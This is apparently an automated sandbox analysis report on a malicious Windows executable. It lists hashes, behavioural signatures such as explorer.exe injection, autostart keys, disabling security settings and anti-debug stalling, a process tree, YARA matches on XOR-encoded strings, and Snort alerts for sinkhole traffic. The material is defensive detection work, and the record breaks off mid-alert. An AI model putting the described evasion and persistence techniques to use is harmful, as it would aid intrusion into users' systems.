Edit tour

Windows Analysis Report
KJEfMLiuRS.exe

Overview

General Information

Sample Name:	KJEfMLiuRS.exe
Analysis ID:	763718
MD5:	bffe00256d8e388757322c0788a1876c
SHA1:	0e188dbaef105e3cd2857a174bc7fdf132694592
SHA256:	28a62aa42e262869a2eb41abcf288d8d555f2154234e33f62a738069878cad09
Tags:	exe
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Antivirus / Scanner detection for submitted sample

Tries to download HTTP data from a sinkholed server

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Writes to foreign memory regions

Found stalling execution ending in API Sleep call

Changes security center settings (notifications, updates, antivirus, firewall)

Machine Learning detection for sample

Allocates memory in foreign processes

Modifies windows update settings

Injects code into the Windows Explorer (explorer.exe)

Creates an undocumented autostart registry key

Machine Learning detection for dropped file

Tries to resolve many domain names, but no domain seems valid

Drops executables to the windows directory (C:\Windows) and starts them

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Detected potential crypto function

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Changes image file execution options

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Connects to many different domains

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

PE file contains an invalid checksum

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Found evaded block containing many API calls

Found large amount of non-executed APIs

Classification

Process Tree

System is w10x64

KJEfMLiuRS.exe (PID: 5360 cmdline: C:\Users\user\Desktop\KJEfMLiuRS.exe MD5: BFFE00256D8E388757322C0788A1876C)

olfopeh-outix.exe (PID: 5168 cmdline: C:\Windows\system32\olfopeh-outix.exe MD5: BFFE00256D8E388757322C0788A1876C)

olfopeh-outix.exe (PID: 5900 cmdline: --k33p MD5: BFFE00256D8E388757322C0788A1876C)

winlogon.exe (PID: 564 cmdline: winlogon.exe MD5: F9017F2DC455AD373DF036F5817A8870)

explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
KJEfMLiuRS.exe	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xbbc4:$s1: ]AAE\x0F\x1A\x1A 0xbbd0:$s1: ]AAE\x0F\x1A\x1A 0xbea0:$s1: ]AAE\x0F\x1A\x1A 0xf440:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf5c0:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf5ee:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf8a0:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf8c0:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf8d3:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB

Dropped Files

Source	Rule	Description	Author	Strings
C:\Windows\SysWOW64\atgusoon-odeas.exe	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xc3c4:$s1: QMMI\x03\x16\x16 0xc3d0:$s1: QMMI\x03\x16\x16 0xc6a0:$s1: QMMI\x03\x16\x16 0xfc40:$s1: \xB0\xAC\xAC\xA8\xE2\xF7\xF7 0xfdc0:$s1: \xB0\xAC\xAC\xA8\xE2\xF7\xF7 0xfdee:$s1: \xB0\xAC\xAC\xA8\xE2\xF7\xF7 0x100a0:$s1: \xB0\xAC\xAC\xA8\xE2\xF7\xF7 0x100c0:$s1: \xB0\xAC\xAC\xA8\xE2\xF7\xF7 0x100d3:$s1: \xB0\xAC\xAC\xA8\xE2\xF7\xF7
C:\Users\user\AppData\Roaming\tmp1D9F.tmp	SUSP_Two_Byte_XOR_PE_And_MZ	Look for 2 byte xor of a PE starting at offset 0	Wesley Shields <wxs@atarininja.org>
C:\Users\user\AppData\Roaming\tmp1D9F.tmp	SUSP_Four_Byte_XOR_PE_And_MZ	Look for 4 byte xor of a PE starting at offset 0	Wesley Shields <wxs@atarininja.org>
C:\Users\user\AppData\Roaming\tmp1D9F.tmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x4e:$xo1: [gf\|/\x7F}`h}nb/lnaa`{/mj/}za/fa/K@\/b`kj 0x66ee:$xo1: \x16+1b20-%0#/b!#,,-6b 'b07,b+,b\x06\x0D\x11b/-&' 0x6f6e:$xo1: \x16+1b20-%0#/b!#,,-6b 'b07,b+,b\x06\x0D\x11b/-&' 0x7c8e:$xo1: \x16+1b20-%0#/b!#,,-6b 'b07,b+,b\x06\x0D\x11b/-&' 0xda8e:$xo1: \x16+1b20-%0#/b!#,,-6b 'b07,b+,b\x06\x0D\x11b/-&' 0xee8e:$xo1: \x16*+1b20-%0#/b!#,,-6b 'b07,b+,b\x06\x0D\x11b/-&'
C:\Windows\SysWOW64\ubboonook.exe	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xc7c4:$s1: -115\x7Fjj 0xc7d0:$s1: -115\x7Fjj 0xcaa0:$s1: -115\x7Fjj 0x10040:$s1: \xCC\xD0\xD0\xD4\x9E\x8B\x8B 0x101c0:$s1: \xCC\xD0\xD0\xD4\x9E\x8B\x8B 0x101ee:$s1: \xCC\xD0\xD0\xD4\x9E\x8B\x8B 0x104a0:$s1: \xCC\xD0\xD0\xD4\x9E\x8B\x8B 0x104c0:$s1: \xCC\xD0\xD0\xD4\x9E\x8B\x8B 0x104d3:$s1: \xCC\xD0\xD0\xD4\x9E\x8B\x8B
C:\Users\user\AppData\Roaming\ogvubeak-omooc.dll	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x3f84:$s1: \x10\x0C\x0C\x08BWW 0x3f90:$s1: \x10\x0C\x0C\x08BWW 0x4260:$s1: \x10\x0C\x0C\x08BWW
C:\Windows\SysWOW64\olfopeh-outix.exe	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xbbc4:$s1: ]AAE\x0F\x1A\x1A 0xbbd0:$s1: ]AAE\x0F\x1A\x1A 0xbea0:$s1: ]AAE\x0F\x1A\x1A 0xf440:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf5c0:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf5ee:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf8a0:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf8c0:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf8d3:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000000.313533493.0000000000401000.00000080.00000001.01000000.00000004.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x62ee:$xo1: \x19%$>m=?"?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")( 0x6b6e:$xo1: \x19%$>m=?"?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")( 0x788e:$xo1: \x19%$>m=?"?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")( 0xd68e:$xo1: \x19%$>m=?"?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")( 0xea8e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
00000001.00000003.314102961.000000000013B000.00000004.00000020.00020000.00000000.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x3e1e:$xo1: iUTN\x1DMORZO\P\x1D^\SSRI\x1D_X\x1DOHS\x1DTS\x1Dyrn\x1DPRYX 0x469e:$xo1: iUTN\x1DMORZO\P\x1D^\SSRI\x1D_X\x1DOHS\x1DTS\x1Dyrn\x1DPRYX 0x53be:$xo1: iUTN\x1DMORZO\P\x1D^\SSRI\x1D_X\x1DOHS\x1DTS\x1Dyrn\x1DPRYX 0xb1be:$xo1: iUTN\x1DMORZO\P\x1D^\SSRI\x1D_X\x1DOHS\x1DTS\x1Dyrn\x1DPRYX 0xc5be:$xo1: iUTN\x1DMORZO\P\x1D^\SSRI\x1D_X\x1DOHS\x1DTS\x1Dyrn\x1DPRYX
00000001.00000003.382741035.0000000000136000.00000004.00000020.00020000.00000000.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x4786:$xo1: Xde\x7F,\|~ck~ma,ombbcx,ni,~yb,eb,HC_,achi
00000002.00000000.314055233.0000000000401000.00000080.00000001.01000000.00000004.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x62ee:$xo1: \x19%$>m=?"?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")( 0x6b6e:$xo1: \x19%$>m=?"?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")( 0x788e:$xo1: \x19%$>m=?"?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")( 0xd68e:$xo1: \x19%$>m=?"?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")( 0xea8e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
00000000.00000000.312972922.0000000000401000.00000080.00000001.01000000.00000003.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x62ee:$xo1: \x19%$>m=?"?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")( 0x6b6e:$xo1: \x19%$>m=?"?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")( 0x788e:$xo1: \x19%$>m=?"?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")( 0xd68e:$xo1: \x19%$>m=?"?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")( 0xea8e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
00000001.00000003.361259093.0000000000121000.00000004.00000020.00020000.00000000.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x5486:$xo1: \x16+1b20-%0#/b!#,,-6b 'b07,b+,b\x06\x0D\x11b/-&' 0x5d06:$xo1: \x16+1b20-%0#/b!#,,-6b 'b07,b+,b\x06\x0D\x11b/-&' 0x6a26:$xo1: \x16+1b20-%0#/b!#,,-6b 'b07,b+,b\x06\x0D\x11b/-&' 0xc826:$xo1: \x16+1b20-%0#/b!#,,-6b 'b07,b+,b\x06\x0D\x11b/-&' 0xdc26:$xo1: \x16*+1b20-%0#/b!#,,-6b 'b07,b+,b\x06\x0D\x11b/-&'
00000001.00000003.361204738.000000000013B000.00000004.00000020.00020000.00000000.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x5e26:$xo1: \x15)(2a13.&3 ,a" //.5a#$a34/a(/a\x05\x0E\x12a,.%$ 0x66a6:$xo1: \x15)(2a13.&3 ,a" //.5a#$a34/a(/a\x05\x0E\x12a,.%$ 0x73c6:$xo1: \x15)(2a13.&3 ,a" //.5a#$a34/a(/a\x05\x0E\x12a,.%$ 0xd1c6:$xo1: \x15)(2a13.&3 ,a" //.5a#$a34/a(/a\x05\x0E\x12a,.%$ 0xe5c6:$xo1: \x15)(2a13.&3 ,a" //.5a#$a34/a(/a\x05\x0E\x12a,.%$
00000001.00000003.382705490.0000000000136000.00000004.00000020.00020000.00000000.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x4786:$xo1: Xde\x7F,\|~ck~ma,ombbcx,ni,~yb,eb,HC_,achi
00000001.00000003.382800704.0000000000136000.00000004.00000020.00020000.00000000.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x4786:$xo1: Xde\x7F,\|~ck~ma,ombbcx,ni,~yb,eb,HC_,achi
00000001.00000003.361292004.0000000000132000.00000004.00000020.00020000.00000000.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x677e:$xo1: $\x18\x19\x03P\x02\x1F\x17\x02\x11\x1DP\x13\x11\x1E\x1E\x1F\x04P\x12\x15P\x02\x05\x1EP\x19\x1EP4?#P\x1D\x1F\x14\x15 0x8786:$xo1: Xde\x7F,\|~ck~ma,ombbcx,ni,~yb,eb,HC_,achi
00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x62ee:$xo1: \x19%$>m=?"?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")( 0x6b6e:$xo1: \x19%$>m=?"?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
00000002.00000002.579508394.0000000000401000.00000080.00000001.01000000.00000004.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x62ee:$xo1: \x19%$>m=?"?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")( 0x6b6e:$xo1: \x19%$>m=?"?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")( 0x788e:$xo1: \x19%$>m=?"?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")( 0xd68e:$xo1: \x19%$>m=?"?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")( 0xea8e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.olfopeh-outix.exe.408840.2.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x3f84:$s1: \x10\x0C\x0C\x08BWW 0x3f90:$s1: \x10\x0C\x0C\x08BWW 0x4260:$s1: \x10\x0C\x0C\x08BWW 0x7800:$s1: http:// 0x7980:$s1: http:// 0x79ae:$s1: http:// 0x7c60:$s1: http:// 0x7c80:$s1: http:// 0x7c93:$s1: http:// 0x7800:$f1: http:// 0x7980:$f1: http:// 0x79ae:$f1: http:// 0x7c60:$f1: http:// 0x7c80:$f1: http:// 0x7c93:$f1: http://
0.2.KJEfMLiuRS.exe.408840.2.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x3f84:$s1: \x10\x0C\x0C\x08BWW 0x3f90:$s1: \x10\x0C\x0C\x08BWW 0x4260:$s1: \x10\x0C\x0C\x08BWW 0x7800:$s1: http:// 0x7980:$s1: http:// 0x79ae:$s1: http:// 0x7c60:$s1: http:// 0x7c80:$s1: http:// 0x7c93:$s1: http:// 0x7800:$f1: http:// 0x7980:$f1: http:// 0x79ae:$f1: http:// 0x7c60:$f1: http:// 0x7c80:$f1: http:// 0x7c93:$f1: http://
1.2.olfopeh-outix.exe.400000.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xbbc4:$s1: \x10\x0C\x0C\x08BWW 0xbbd0:$s1: \x10\x0C\x0C\x08BWW 0xbea0:$s1: \x10\x0C\x0C\x08BWW 0xf440:$s1: http:// 0xf5c0:$s1: http:// 0xf5ee:$s1: http:// 0xf8a0:$s1: http:// 0xf8c0:$s1: http:// 0xf8d3:$s1: http:// 0xf440:$f1: http:// 0xf5c0:$f1: http:// 0xf5ee:$f1: http:// 0xf8a0:$f1: http:// 0xf8c0:$f1: http:// 0xf8d3:$f1: http://
1.2.olfopeh-outix.exe.408840.2.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x3384:$s1: \x10\x0C\x0C\x08BWW 0x3390:$s1: \x10\x0C\x0C\x08BWW 0x3660:$s1: \x10\x0C\x0C\x08BWW
0.2.KJEfMLiuRS.exe.408840.2.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x3384:$s1: \x10\x0C\x0C\x08BWW 0x3390:$s1: \x10\x0C\x0C\x08BWW 0x3660:$s1: \x10\x0C\x0C\x08BWW
1.2.olfopeh-outix.exe.407b20.1.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x4ca4:$s1: \x10\x0C\x0C\x08BWW 0x4cb0:$s1: \x10\x0C\x0C\x08BWW 0x4f80:$s1: \x10\x0C\x0C\x08BWW 0x8520:$s1: http:// 0x86a0:$s1: http:// 0x86ce:$s1: http:// 0x8980:$s1: http:// 0x89a0:$s1: http:// 0x89b3:$s1: http:// 0x8520:$f1: http:// 0x86a0:$f1: http:// 0x86ce:$f1: http:// 0x8980:$f1: http:// 0x89a0:$f1: http:// 0x89b3:$f1: http://
2.2.olfopeh-outix.exe.400000.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xbbc4:$s1: ]AAE\x0F\x1A\x1A 0xbbd0:$s1: ]AAE\x0F\x1A\x1A 0xbea0:$s1: ]AAE\x0F\x1A\x1A 0xf440:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf5c0:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf5ee:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf8a0:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf8c0:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf8d3:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB
0.2.KJEfMLiuRS.exe.400000.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xbbc4:$s1: \x10\x0C\x0C\x08BWW 0xbbd0:$s1: \x10\x0C\x0C\x08BWW 0xbea0:$s1: \x10\x0C\x0C\x08BWW 0xf440:$s1: http:// 0xf5c0:$s1: http:// 0xf5ee:$s1: http:// 0xf8a0:$s1: http:// 0xf8c0:$s1: http:// 0xf8d3:$s1: http:// 0xf440:$f1: http:// 0xf5c0:$f1: http:// 0xf5ee:$f1: http:// 0xf8a0:$f1: http:// 0xf8c0:$f1: http:// 0xf8d3:$f1: http://
2.0.olfopeh-outix.exe.400000.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xbbc4:$s1: ]AAE\x0F\x1A\x1A 0xbbd0:$s1: ]AAE\x0F\x1A\x1A 0xbea0:$s1: ]AAE\x0F\x1A\x1A 0xf440:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf5c0:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf5ee:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf8a0:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf8c0:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf8d3:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB
0.0.KJEfMLiuRS.exe.400000.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xbbc4:$s1: ]AAE\x0F\x1A\x1A 0xbbd0:$s1: ]AAE\x0F\x1A\x1A 0xbea0:$s1: ]AAE\x0F\x1A\x1A 0xf440:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf5c0:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf5ee:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf8a0:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf8c0:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf8d3:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB
1.0.olfopeh-outix.exe.400000.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xbbc4:$s1: ]AAE\x0F\x1A\x1A 0xbbd0:$s1: ]AAE\x0F\x1A\x1A 0xbea0:$s1: ]AAE\x0F\x1A\x1A 0xf440:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf5c0:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf5ee:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf8a0:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf8c0:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB 0xf8d3:$s1: \xBC\xA0\xA0\xA4\xEE\xFB\xFB
1.2.olfopeh-outix.exe.4072a0.3.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x5524:$s1: \x10\x0C\x0C\x08BWW 0x5530:$s1: \x10\x0C\x0C\x08BWW 0x5800:$s1: \x10\x0C\x0C\x08BWW 0x8da0:$s1: http:// 0x8f20:$s1: http:// 0x8f4e:$s1: http:// 0x9200:$s1: http:// 0x9220:$s1: http:// 0x9233:$s1: http:// 0x8da0:$f1: http:// 0x8f20:$f1: http:// 0x8f4e:$f1: http:// 0x9200:$f1: http:// 0x9220:$f1: http:// 0x9233:$f1: http://
Click to see the 7 entries

Snort Signatures

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497392016803 12/08/22-20:23:31.759468
SID:	2016803
Source Port:	80
Destination Port:	49739
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query to a .tk domain - Likely Hostile - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.859380532012811 12/08/22-20:23:30.267249
SID:	2012811
Source Port:	59380
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497542016803 12/08/22-20:23:54.488035
SID:	2016803
Source Port:	80
Destination Port:	49754
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497572016803 12/08/22-20:24:06.035247
SID:	2016803
Source Port:	80
Destination Port:	49757
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497592016803 12/08/22-20:24:07.918298
SID:	2016803
Source Port:	80
Destination Port:	49759
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497362016803 12/08/22-20:23:27.166137
SID:	2016803
Source Port:	80
Destination Port:	49736
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497532016803 12/08/22-20:23:54.423796
SID:	2016803
Source Port:	80
Destination Port:	49753
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query to a *.pw domain - Likely Hostile - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.850037532016778 12/08/22-20:24:01.204526
SID:	2016778
Source Port:	50037
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET DNS Query to a *.pw domain - Likely Hostile - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.859423532016778 12/08/22-20:23:35.349617
SID:	2016778
Source Port:	59423
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497352016803 12/08/22-20:23:27.061037
SID:	2016803
Source Port:	80
Destination Port:	49735
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497382016803 12/08/22-20:23:31.700039
SID:	2016803
Source Port:	80
Destination Port:	49738
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query to a .tk domain - Likely Hostile - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.850157532012811 12/08/22-20:23:53.274454
SID:	2012811
Source Port:	50157
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497152016803 12/08/22-20:23:06.231949
SID:	2016803
Source Port:	80
Destination Port:	49715
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497322016803 12/08/22-20:23:25.464357
SID:	2016803
Source Port:	80
Destination Port:	49732
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497332016803 12/08/22-20:23:25.982189
SID:	2016803
Source Port:	80
Destination Port:	49733
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480496992016803 12/08/22-20:22:57.921531
SID:	2016803
Source Port:	80
Destination Port:	49699
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497122016803 12/08/22-20:23:01.084049
SID:	2016803
Source Port:	80
Destination Port:	49712
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497142016803 12/08/22-20:23:05.566997
SID:	2016803
Source Port:	80
Destination Port:	49714
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497172016803 12/08/22-20:23:06.970012
SID:	2016803
Source Port:	80
Destination Port:	49717
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497182016803 12/08/22-20:23:07.040295
SID:	2016803
Source Port:	80
Destination Port:	49718
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497112016803 12/08/22-20:23:01.014174
SID:	2016803
Source Port:	80
Destination Port:	49711
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480496962016803 12/08/22-20:22:40.566513
SID:	2016803
Source Port:	80
Destination Port:	49696
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query to a *.pw domain - Likely Hostile - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.858128532016778 12/08/22-20:23:38.414344
SID:	2016778
Source Port:	58128
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET DNS Query to a *.pw domain - Likely Hostile - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.857430532016778 12/08/22-20:23:50.630568
SID:	2016778
Source Port:	57430
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET DNS Query to a .tk domain - Likely Hostile - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.850836532012811 12/08/22-20:23:32.848684
SID:	2012811
Source Port:	50836
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497512016803 12/08/22-20:23:51.916223
SID:	2016803
Source Port:	80
Destination Port:	49751
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query to a .tk domain - Likely Hostile - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.853790532012811 12/08/22-20:24:08.175497
SID:	2012811
Source Port:	53790
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497602016803 12/08/22-20:24:07.971747
SID:	2016803
